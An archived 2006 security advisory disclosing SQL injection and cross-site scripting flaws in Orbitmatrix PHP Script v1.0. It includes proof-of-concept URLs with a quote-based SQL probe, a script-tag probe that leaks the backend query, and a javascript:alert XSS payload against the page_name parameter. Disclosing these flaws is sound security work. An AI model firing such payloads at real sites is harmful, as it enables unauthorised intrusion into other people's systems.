Orbitmatrix-v1.0.txt

Orbitmatrix-v1.0.txt: Posted Jul 14, 2006; Authored by Luny; Orbitmatrix PHP Script v1.0 suffers from XSS and SQL injection vulnerabilities.; tags | advisory, php, vulnerability, sql injection; SHA-256 | 7df647ec0e675831feada06c15fdfa9e7ea9a90b4b702d4dd69dab85741c61d9; Download | Favorite | View

Orbitmatrix-v1.0.txt

Orbitmatrix PHP Script v1.0

Homepage:
http://www.orbitcoders.com/

Affected files:
index.php

Possible SQL injection?:
http://www.example.com/index.php?page_name='

And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen:

http://www.example.com/index.php?page_name=contact<script>

And the displayed query:

Query: select code from pages where name=contact

Now we know the tables name is pages and a row is name.

This works on all variable values.

As the above XSS vuln wont work, we can see that using the one below will:

http://www.example.com/index.php?page_name=<IMG%20SRC=javascript:alert('XSS')>

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Orbitmatrix-v1.0.txt

Orbitmatrix-v1.0.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Orbitmatrix-v1.0.txt

Share This

Orbitmatrix-v1.0.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems